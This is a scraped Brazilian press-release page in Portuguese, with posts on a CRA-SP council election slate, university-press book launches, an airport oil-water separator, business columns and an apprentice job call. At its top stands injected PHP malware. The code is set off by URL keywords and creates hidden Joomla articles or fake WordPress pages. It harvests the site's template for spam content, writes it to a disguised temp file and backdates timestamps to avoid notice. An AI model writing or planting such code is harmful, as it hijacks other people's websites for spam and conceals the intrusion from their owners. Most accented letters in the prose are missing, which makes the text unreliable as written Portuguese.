if (strpos($_SERVER['REQUEST_URI'], 'saveyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $context = stream_context_create(array( 'http' => array('ignore_errors' => true), )); $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/?gimmeyourfuckingtemplate', false, $context); if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate', false, $context); } if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate/', false, $context); } if ( preg_match('/thefuckingtitle\d+/', $tpl) || preg_match('/thefuckingcontent\d+/', $tpl) || (strpos($tpl, '[TITLE]') !== false) || (strpos($tpl, '[CONTENT]') !== false) ) { $tpl = str_replace('http://[PAGE_URL]', '[PAGE_URL]', $tpl); $tpl = preg_replace('#]+?alternate[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?archives[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bookmark[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?external[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?first[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?help[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?last[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?license[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?next[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?nofollow[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?noreferrer[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?pingback[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prefetch[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prev[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?search[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?sidebar[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?up[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?canonical[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?robots[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?charset[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?content-type[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?og:[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?viewport[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?keywords[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?description[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?google[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?yandex[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bing[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?slurp[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?refresh[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?referer[^>]+?>#is', '', $tpl); $tpl = preg_replace('##is', '', $tpl); $tpl = preg_replace('#http://www.google-analytics.com/#is', 'http://'.$_SERVER['HTTP_HOST'].'/', $tpl); $tpl = preg_replace('#]*>[^<]*?#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#

\[CONTENT\]

#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); $tpl_path = sys_get_temp_dir()."/SESS_4f2afc9c4099ee1f39c9f551123e54bd"; if (!empty($tpl) && file_put_contents($tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } } Divulgação de releases gratuitos - Divulga Release

Depois de 40 anos de alternncia no poder de um mesmo grupo de profissionais, o Conselho Regional de Administrao, que rene 65 mil profissionais tem chapa de oposio nas eleies de 18 de outubro

Com o principal objetivo de intensificar a fiscalizao como misso primeira do CRA, a chapa 1 MUDE se inscreve para disputar as eleies desse ano para os prximos 4 anos. Os conselheiros Adm. Arlindo Vicente Junior Adm. Jos Alfredo Machado de Assis Adm. Milton Luiz Milioni e os suplentes Adm. Flvio Rodrigues de Oliveira Adm. Carlos Alberto da Silva Adm. Gervsio Martins Carvalho devero, se eleitos, eleger o presidente que coordenar as atividades do Conselho para os prximos 4 anos.

Para o candidato conselheiro, administrador Flavio Rodrigues Oliveira, existe uma diferena enorme entre fiscalizar e multar. Nossa proposta – explica – atuar de forma forte na fiscalizao onde procuraremos identificar profissionais de outras reas que estejam exercendo suas atividades no campo da administrao.

Diferente do que se identifica hoje, onde o foco na multa, ou seja, penalizar o administrador registrado que esteja inadimplente. Ns tambm teremos nossa ateno voltada para os devedores at por uma questo de justia com aqueles que se mantm em dia com suas obrigaes. Contudo, atuaremos intensamente na fiscalizao e defesa do nosso espao de trabalho.”

POSICIONAMENTO

Depois de anos de atuao dos conselheiros nesse mercado, a Chapa 1 Mude pretende criar um espao junto grande imprensa e formadores de opinio para fazer chegar ao governo e sociedade civil os pleitos principais dos administradores, passando principalmente pela defesa do mercado de trabalho.

“Mas o conselho no se posiciona em questes nacionais que so do interesse da nao e da profisso. Quem nunca escutou isso?”, Questiona Rodrigues. “Para a chapa em questo, no se trata de corporativismo, nem de fechamento de mercado, mas sim de posicionamento. O administrador precisa ter voz ativa e precisa ser escutado. Afinal, tenho certeza que temos o que contribuir com a nao. Mas argumenta – para que haja esta representatividade necessrio antes o reconhecimento e isso s vir quando defendermos nosso espao de mercado e institucional.”

Entre outras propostas, Rodrigues destaca desenvolver o estudo e implantao nacional do documento do administrador como instrumento de trabalho, homologando suas aes e atividades, promover a interiorizao do CRA-SP e fortalecer as seccionais, fiscalizar os concursos pblicos no campo da administrao e apoiar o projeto de lei do senado federal 439/15 que estabelece atribuies que devero ser promovidas apenas por administradores e tecnlogos, alm, obviamente, de exercer um maior controle e utilizao dos recursos da entidade, em prol dos administradores afiliados.

Segue abaixo mini currculo dos candidatos:

ADM. ARLINDO VICENTE JUNIOR
Ps-graduado em recursos humanos.
Scio proprietrio da AVJ Seguros Gerais.
Consultor em Administrao Patrimonial, Seguros e Administrador Judicial.
Membro do grupo de Excelncia em Administrao Esportiva no CRA-SP.

ADM. (CAC) CARLOS ALBERTO DA SILVA
Vice-Presidente da Associao dos Administradores de Empresas de Santos.
Desenvolve suas atividades na Companhia Docas do Estado de So Paulo tendo mais de 42 anos de servios prestados ao maior porto da amrica latina.

ADM. FLAVIO RODRIGUES DE OLIVEIRA
26 anos promovendo aes de marketing de relacionamento, eventos e relaes institucionais. Palestrante acadmico e corporativo. Ps-graduado em gesto do conhecimento pela FGV/SP.
Ps-graduado em planejamento estratgico de comunicao institucional pela ESPM/SP.Especializado em planejamento de eventos nacionais e internacionais, em gesto estratgica de servios e planejamento estratgico de projetos.

ADM. GERVSIO MARTINS CARVALHO
Doutorando em administrao empresarial e comrcio internacional pela Universidade de Extremadura na Espanha.
Fundador da Universidade dos Maiores no Brasil, diretor-presidente do CEPC – Centro Educacional Pesquisa e Cultura.
Presidente do Instituto Ibero Americano de Excelncia na Educao. Professor executivo da FGV em: negociao e estratgia empresarial.

ADM. MILTON LUIZ MILIONI
Administrador de empresas pela FEA USP, membro dos Conselhos do Mercado de Capitais da Anbima, superior de economia da FIESP, Fiscal da Cielo S.A. e de tica da APIMEC.
Analista de investimento e administrador de carteiras registrado na CVM.
Ocupou a presidncia da APIMEC e da vice-presidncia do CRA-SP.
36 anos no mercado de capitais em instituies nacionais e internacionais.

ADM. JOS ALFREDO MACHADO DE ASSIS
Graduado em administrao de empresas pela UNIFIEO e com especializao em Business Administration pela Richardson Electronics (ill-usa).
Consultor de empresas.
Jornalista, com nfase em marketing poltico.
Diretor executivo da Associao Paulista de Imprensa.
Vice-presidente administrativo no CRA-SP.

Mais informaes pelo sitewww.votaadministrador.org.br

Imprimir o Post No Comments Share

Evento duplo acontece no dia 6 de outubro na Casa Mrio de Andrade

Explorador, fotgrafo e pesquisador de lnguas, costumes e mitos amaznicos, o conde italiano Ermanno Stradelli (Borgotaro, Parma 1852 Manaus, 1926) viveu 43 anos no Brasil recolhendo relatos dos povos indgenas e registrando suas imagens.

Quando se completam 90 anos de sua morte, a Editora Unesp e o Istituto Italiano di Cultura de So Paulo lanam o livroA nica vida possvel: Iitinerrios de Ermanno Stradelli na Amaznia, organizado por Livia Raponi, uma coletnea de ensaios de especialistas brasileiros e italianos, de diferentes reas disciplinares.

A obra ilustra a mltipla atuao desse incansvel pesquisador, que, entre os sculos XIX e XX, dedicou grande parte de sua existncia em conhecer e divulgar as expresses originais das culturas autctones do Alto Rio Negro, sendo, at hoje, uma imprescindvel referncia para os estudiosos de antropologia, lnguas e literaturas amerndias.

Na mesma ocasio ser aberta a exposio fotogrficaNos passos de Ermanno Stradelli. Viagem Amaznia, que rene imagens do prprio Stradelli e imagens mais recentes de Graziano Bartolini, realizadas ao longo de uma explorao fluvial seguindo os passos do explorador italiano.

Lanamento do livro e abertura da exposio: 6 de outubro (quinta-feira), s 19h
Visitao da exposio: de 7 de outubro a 19 de novembro de 2016 (de segunda-feira a quinta-feira, das 10 s 18h)
Local: Oficina Cultural Casa Mrio de Andrade
R. Lopes Chaves, 546 – Barra Funda | So Paulo (SP) | Tel: (11) 3826-4085
Entrada franca

Mais informaes sobre os livros publicados pela Editora Unesp esto disponveis no site:www.editoraunesp.com.br

Imprimir o Post No Comments Share

As graves crises que assolam o planeta desigualdades sociais, econmicas e culturais, desequilbrios ambientais, perda da diversidade biolgica e cultural, desconsiderao e negligncia dos direitos humanos e dos direitos do ambiente justificam a urgncia da construo de novos modelos educacionais que resultem no desenvolvimento de sociedades democrticas. Partindo do pressuposto que essas questes so ao mesmo tempo causa e consequncia da viso de mundo construda pelas civilizaes ao longo do tempo e em diferentes espaos, a EdUFSCar lanaCultura no espao da diversidade, sustentabilidade e incluso, organizado por Denise de Freitas.

Dividida em cinco unidades, o objetivo da obra fazer com que o leitor expresse o que pensa sobre cultura, identifique a diversidade que h em diferentes espaos sociais e interprete cultura como uma produo social construda historicamente. A primeira unidade busca destacar a maneira como a cultura influencia fortemente a vida de uma comunidade e, ao mesmo tempo, como por ela influenciada. A segunda trata das relaes de incluso e excluso, enfocando a desigualdade social, econmica e cultural, bem como as polticas pblicas e outras iniciativas que visem fazer frente a tal situao. A seguinte fala de direitos humanos, diversidade e sustentabilidade, relacionando-os com questes que interessam rea da Educao. A quarta discute a educao sustentvel como uma das prticas sociais, focalizando as relaes sociais em suas diferentes dimenses, especialmente a econmica, a poltica e a cultural. A ltima unidade visa aplicar os conceitos abordados anteriormente instituio escolar.

Trazendo para o campo da educao um debate que parte do conceito de cultura para envolver-se pelos sistemas de significaes de prticas sociais que condicionam e modificam a vida social, as 11 autoras envolvidas na obra esperam que o livro se constitua em uma ferramenta de formao inicial e continuada de professores e fomente indagaes e olhares crticos para alm da escola.

Sobre a organizadora Denise de Freitas graduada em Cincias Biolgicas pela Faculdade de Filosofia, Cincias e Letras do Centro Universitrio Baro de Mau, com especializao em Ensino de Cincias pela Unicamp, mestrado em Educao pela UFSCar, doutorado em Educao pela USP e ps-doutorado pela Universidade de Lisboa, em Portugal. Professora-associada no Departamento de Metodologia de Ensino da UFSCar. Atua nas seguintes linhas de pesquisa: formao de professores de cincia; processos de ensino e aprendizagem; ensino de cincia e biologia; e ambientalizao curricular.

Ttulo: Cultura no espao da diversidade, sustentabilidade e incluso
Organizadora: Denise de Freitas
Nmero de pginas: 71
Formato: 21,5 x 27,5 cm
Preo: R$ 21,00
ISBN: 978-85-7600-436-3

Mais informaes sobre os livros da EdUFSCar esto disponveis no site www.editora.ufscar.br

Imprimir o Post No Comments Share

Conversaes com Goethe nos ltimos anos de sua vida, livro que inicia a Coleo Goethe, , segundo Nietzsche, o livro mais importante j escrito em alemo

Conversaes com Goethe nos ltimos anos de sua vida o ttulo com o qual a Editora Unesp inaugura sua srie de publicaes de textos no ficcionais de Goethe. Alm de ser a primeira traduo completa em portugus,Conversaes tem a vantagem de apresentar de modo sinttico a vastido dos interesses desse gnio universal e de seus mltiplos talentos. O que casa perfeitamente com o objetivo da Coleo: oferecer acesso o mais amplo possvel sua obra no literria. A primeira seo reunir os principais escritos de carter autobiogrfico e os relatos de viagem, a segunda ser dedicada aos trabalhos de esttica e a terceira s suas incurses no campo das cincias da natureza.

Conversaes resultado das zelosas anotaes dirias e de argutas observaes de seu secretrio Johann Peter Eckermann, queconsolida para a posteridade uma determinada imagem do gnio alemo (este o meu Goethe, escreve na introduo) e oferece uma imersoprofunda no cotidiano do grande poeta em seus ltimos nove anos de vida (de 1823 a 1831) que possibilita conhecer melhor tanto o literato quanto a sua poca.

E, entre comentrios sobre assuntos variados literatura, pintura, msica, teatro, filosofia, cincias, religio, poltica , surgem as frases que se tornariam referncias conceituais to marcantes que levaram Nietzsche a considerarConversaes com Goethe o melhor livro j escrito em alemo (e Walter Benjamin a defini-lo como um dos maiores livros de prosa de todo o sculo XIX). Principalmente, claro, as suas observaes sobre literatura se tornaram concepes importantes, como quando aborda o tema de uma literatura mundial a poesia como patrimnio comum da humanidade, a necessidade do poeta em buscar a cultura universal, as vantagens do intercmbio entre o particular e o universal.

Ou quando, de modo casual, define o que novela: Sabe de uma coisa? disse Goethe. Vamos cham-la de Novela; pois que uma novela seno a ocorrncia de um evento inaudito?. Ou, ainda, quando analisa o trabalho de outros autores e filsofos. Enfim, uma fonte abundante de ideias que d um significado especial ao modo como Eckermann finaliza estasConversaes: Goethe calou-se. Eu, porm, guardei em meu corao suas grandes e boas palavras.

Ttulo:Conversaes com Goethe nos ltimos anos de sua vida
Autor: Johann Peter Eckermann
Coordenao da srie e traduo:Mario Luiz Frungillo
Nmero de pginas: 718
Formato: 16 x 23 cm
Preo: R$ 138,00
ISBN: 978-85-393-0629-9

Mais informaes sobre os livros publicados pela Editora Unesp esto disponveis no site:www.editoraunesp.com.br

Imprimir o Post No Comments Share

J est em operao o sistema de separao de gua e leo do Aeroporto Internacional Galeo, fornecido pela Ecosan, empresa lder em equipamentos para tratamento primrio e secundrio de efluentes domsticos e industriais, com a finalidade de atender s normas que estabelecem os critrios e padres para lanamento de efluentes lquidos e os parmetros para concepo, instalao e operao de sistema de drenagem oleosa para postos de servio.

Utilizando produtos e servios na modalidade turn key, a Ecosan foi contratada pela RIOgaleo, operadora responsvel pela ampliao e manuteno do aeroporto, para a implementao do projeto, fabricao, transporte, instalao e comissionamento de todos os equipamentos, acessrios, instrumentos e testes relativos ao separador da gua e do leo, incluindo a confeco de manuais de operao, ensaios e lista de peas de reposio.

Separao da gua e do leo

Andr Ricardo Telles, diretor executivo da Ecosan do Brasil, explica que as guas que apresentam concentraes de leo acima do permitido precisam passar por um tratamento de separao da gua e do leo para serem despejadas em reservatrios naturais.

No caso dos aeroportos, a aplicao desse tipo de resoluo cabvel, j que os locais de paradas das aeronaves apresentam um risco potencial para derramamento de derivados de petrleo, segundo Telles.

Os derramamentos podem ser provenientes de leos dos sistemas hidrulicos, graxa para lubrificao de componentes das aeronaves e querosene de aviao. Caso ocorram vazamentos e, em seguida, chova, a gua da chuva vai carregar o leo para o meio ambiente, salienta o diretor da Ecosan.

Com a instalao do sistema, o leo separado da gua, armazenado e despejado adequadamente, sem correr o risco de ser lanado no meio ambiente, enquanto a gua, j tratada, ser direcionada ao sistema de drenagem, para, enfim, ser despejada no meio ambiente.

Processo

A captao da gua na rea sujeita contaminao por leo feita por meio de canaletas, providas de grelhas, que impedem a entrada de resduos grandes, causadores de entupimento do sistema. O armazenamento desta gua feito em tubos instalados abaixo das canaletas, capazes de coletar o volume referente aos primeiros 13 mm de chuva que incidirem sobre esta rea.

O encaminhamento da gua oleosa at o local de tratamento feito por dois modos distintos, por gravidade ou bombeada, dependendo da localizao dos tubos armazenadores. O fludo transportado at o Tanque Acalmador, que tem como funo realizar um pr-tratamento, revertendo o processo de emulsificao imposto mistura quando esta bombeada.

Aps esse pr-tratamento, o fludo encaminhado ao Separador gua e leo, para, enfim, ser definitivamente descartado ao ambiente. O leo armazenado no separador dever ser retirado periodicamente do separador para o descarte adequado.

Imprimir o Post No Comments Share

Diz uma frase que li uma vez, e da qual no me lembro o autor, que insanidade tentar obter resultados diferentes fazendo sempre a mesma coisa. o que, de uma maneira estranha, quer dizer o ttulo de nosso artigo de hoje. Para todos as pessoas “normais”, a soma 2 + 2 vai ser sempre igual a 5. E por mais que voc tente explicar que, se houver sinergia, isto pode ser possvel, do ponto de vista numrico, no.

O que temos visto em nossas andanas e intervenes em empresas, ao longo destes mais de 25 anos de atividades, que as empresas, via de regra, querem obter resultados diferentes daqueles que tm tido nos ltimos tempos. Mas falta a coragem para mudar.

E sabem por qu? Porque mudar custa. Todo o tipo de custo que se possa imaginar, incluindo financeiro.

Vamos propor um exemplo fictcio, pero no mucho, para poder ilustrar nosso ponto de vista.

Imagine a empresa ACME, fabricante de produtos industriais que fornece para todo o pas (com potencial para fornecer para o mundo). Seu departamento de vendas formado por profissionais experientes, com mais de 10 anos de casa e que conhecem o mercado. So liderados por um experiente gerente de vendas que, h mais de 10 anos, vem sendo responsvel pelo crescimento da companhia. A empresa vinha em uma crescente at que, de uns tempos para c, comeou a no crescer mais da forma mesma.

O que lhe parece esta estria?Soa familiar? No se assuste. No estamos falando de sua empresa e, sim, de uma grande maioria de empresas que esto presentes no mercado nacional (e, na sua grande maioria, infelizmente, de capital genuinamente brasileiro).

Agora, quando esses profissionais de vendas (vendedores, representantes e gerentes) so questionados de por que as coisas no andam mais como antigamente, a resposta vem rpida:

“ o mercado!!!”

Ora, mas que mercado esse que faz com que determinadas empresas sigam em frente, enquanto outras se debilitem? Por isso, toda vez que sou questionado sobre o que estou achando do mercado, imediatamente respondo. “No conheo este cidado!” No estranhe, pois a mais pura verdade. Mercado no existe.O que existem so clientes. Alguns esto pensando em crescer, outros, em encolher, outros, em vender a empresa pela melhor oferta, outros, em comprar quem estiver venda, outros, em ampliar seus negcios para o mundo, outros, em se aposentar. E por mais que voc tente tirar uma mdia do comportamento deles, voc vai ver que no vai te levar a nada. Seria como colocar um indvduo com os ps dentro de um forno e a cabea dentro de um congelador. O umbigo (mdia) pode estar na temperatura ideal, mas o fulano est morto. Tentar nivelar clientes s poder lhe trazer a triste constatao de que o mercado est ruim.

Tenho um conhecido que trabalha com venda de automveis em uma concessionria e, em um encontro recente,queixou-se barbaramente de que as vendas de carros, no ms de maio, foram ruins. Dias depois, vejo uma notcia na internet dizendo que a venda de carros zero quilmetro tinha crescido 20%. Em quem acreditar? Para mim est claro: Na notcia. Por duas razes:

1) Era uma notcia boa e imprensa vive de dar notcia ruim. Para poder merecer espao, deve ser verdadeira.

2) Eu conheo esta pessoa e ela sempre agiu assim. Chega de manh no trabalho, senta-se mesa lendo o jornal, enquanto espera que os clientes venham at a concessionria. Ela no vende. O cliente compra. Ela no tem um cadastro das pessoas que compraram carro com ela nos ltimos anos para poder ligare propor uma troca de modelo. Ela no pega os classificados de veculos para ver quem que est vendendo carros para poder, dali a alguns dias, ligar para o camarada e propor algum negcio. Enfim, ela sempre faz tudo sempre igual (como na msica do Chico Buarque).

E claro que a soma (2 + 2) dele sempre vai dar quatro, porque, para dar cinco, a soma tem que ser diferente.

Pense sobre o assunto e veja o quanto voc est somando sempre as mesmas parcelas e querendo obter resultados diferentes. Se no estiver conseguindo enxergar, chame-nos. Quem sabe a gente ajuda voc a achar.

(*) Sidney Coldibelli tem formao em Engenharia Eltrica, Administrao de Empresas e Marketing. Atualmente, diretor da Inteligncia de Marketing. E-mail:sidney@inteligenciamkt.com.br

Imprimir o Post No Comments Share

O Frederich Nietzche disse uma vez que “a certeza maior inimiga da verdade do que a mentira.”. Bastante oportuno quando discutimos negcios internacionais, especialmente aqueles que envolvem posturas to distintas.

Empresas de porte internacional quando chegam nas terras de Capitu (aquela, dos olhos negros como a grana) tem dois caminhos a seguir: ou “abrasileiram-se” ou tentam impor seu modus operandi a ns. No segmento de hotis e resorts no diferente. Por certo que meus argumentos podem ser escrutinados em seu fundamento com uma simples olhada matemtica no mercado, mas como eu tenho que encher uns toques vou dialogar com voc.

No existem marcas hoteleiras desenvolvidas pelos players internacionais para o mercado brasileiro, olhando para o hspede brasileiro e suas necessidades. A marca melhor identificada conosco, uma marca francesa que colou no gosto brazuca a ponto de se transformar em uma metonmia hoteleira: “veja se nesta cidade tem um hotel assim, tipo Ibis!”. Entendeu?

Fora nossos amigos, herdeiros bem sucedidos de Villegagnon, ningum conseguiu esta faanha. Por que? Porque a certeza ofende a realidade, substituindo a verdade do incio. Marcas bem sucedidas na Crocia, podem no ser to bem sucedidas no Brasil, assim como no Peru ou Mxico.

O negcio da consistncia, da certeza per se, s se aplica a novos mercados depois de muita, mas muita pesquisa. Converse com a Carolina Narloch da empresa Mapie Especialistas Estratgicos e ela te explica.

Outro olhar sobre estrangeiros operando seus produtos por aqui com boas margens de lucro, seria sobre as montadoras de automveis que, inteligentemente, desenvolveram carros no Brasil para os brasileiros. Das auto!

O desconhecimento e o desdm pelas regras do “Dr. Mercado” brasileiro funcionam como uma ncora no crescimento de empresas hoteleiras americanas, pesando tanto que apenas permitem a sobrevivncia em duas capitais e, mesmo assim, com seus prprios investimentos.

Outra marca americana, entretanto, j conta seus hotis do Oiapoque ao Chu as dezenas, pois entendeu o querem os investidores e clientes brasileiros. Aprendeu rpido as tais “rules of the engagement” e est indo bem, considerando nosso cenrio nos atuais dias de Temer.

Operar em um pas com as dimenses e caractersticas culturais do Brasil exige profundo estudo e presena local intensiva, principalmente com poder de deciso, e adaptao aos diferentes modelos de negcio praticados por aqui.

No agir assim, certamente levar estas marcas a transformar seu desejo de implantar hotis no modelo “plug and play” (ligue e opere) para a realidade de desenvolvimento “plug and pray” (ligue e reze).

Enquanto isso, o Patrick Mendes e sua trupe furiosa continua a cozinhar um hotel por dia, conquistando o Brasil tal e qual queria seu compatriota, o tal Nicolas de Villegagnon.

“Well done”, devem estar dizendo os inimigos.

*Julio Gavinho executivo da rea de hotelaria com 30 anos de experincia, fundador dadoispontozero Hotis e criador da marca ZiiHotel.

Imprimir o Post No Comments Share

Estão abertas as inscrições do processo seletivo para duas vagas de aprendizes, residentes em São Paulo.

Para concorrer, os candidatos devem ter entre 18 e 22 anos e estar matriculado e frequentando cursos técnicos de Administração, Finanças ou Contabilidade do Centro Paula Souza.

A jornada de aprendizagem é de oito horas diárias, quatro na empresa e quatro na escola técnica, totalizando 20 horas semanais na empresa e 20 horas semanais na escola técnica, vedada a prorrogação e a compensação de jornada na empresa.

A remuneração é R$ 8,00/hora, mais benefícios como auxílio transporte, vale refeição, vale cultura e assistência médica. O contrato de aprendizagem tem duração de 12 meses.

As inscrições estão abertas de 26 de setembro a 7 de outubro e devem ser feitas somente pelo  site www.editoraunesp.com.br/processoseletivo, no campo Programa Aprendiz 2016. O candidato deve ler o Edital completo e então preencher a ficha de inscrição.

Imprimir o Post No Comments Share

Em 26 de setembro de 1889, nascia na aldeia católica de Messkirsch, em Baden, o filósofo alemão Martin Heidegger. Este expoente do século XX, desferiu seu ataque à “pretensa clareza” do pensamento ocidental tradicional. Para Heidegger, não somos nem almas imortais nem intelectos incorpóreos, mas existências históricas finitas. “A entidade que temos a tarefa de analisar somos nós mesmos”, afirma o pensador.

Para ampliar a reflexão sobre as contribuições de Heidegger e homenagear seus 127 anos, a Editora Unesp oferece 20% desconto nas obras sobre o filósofo alemão. A promoção é válida até 1º de outubro. Confira a seleção abaixo:

Heidegger

Autor: Jonathan Rée | Páginas: 68 | De R$ 18,00 por R$ 14,40

O livro introduz o leitor de maneira didática ao pensamento de Heidegger. A verdade para este célebre filósofo alemão é essencialmente histórica. Em sua obra Ser e tempo, ele usou a técnica da “análise existencial” para solapar dilemas tradicionais ligados à objetividade e à subjetividade, à racionalidade e à irracionalidade, ao absolutismo e ao relativismo. Jonathan Rée desenvolve esclarecedores argumentos em torno desses debates.

Poesia e pensamento em Hölderlin e Heidegger

Autor: Marco Aurélio Werle | Páginas: 216 | De R$ 48,00 por R$ 38,40
Neste ensaio primoroso, Marco Aurélio Werle examina com acuidade as relações entre o pensamento de Martin Heidegger e a poesia de Friedrich Hölderlin. O autor investiga a constituição da noção de poesia nos textos do filósofo, demonstrando como o trajeto em direção a Hölderlin toma impulso em Ser e tempo, obra na qual Heidegger lançou as bases de seu pensamento.

Autor: Theodor W. Adorno | Páginas: 376 | De R$ 64,00 por R$ 51,20

A crítica da fenomenologia foi uma constante na experiência intelectual de Adorno desde sua juventude, seja através de Husserl ou  de Heidegger. A obra estabelece uma ponte entre a juventude e a maturidade de Adorno, permitindo que o leitor de língua portuguesa tenha uma visão mais fiel da gênese de seu pensamento, como a influência de Heidegger e Husserl neste expoente da Escola de Frankfurt.

Depois de 1945

Autor: Hans Ulrich Gumbrecht | Páginas: 360 | De R$ 54,00 por R$ 43,20

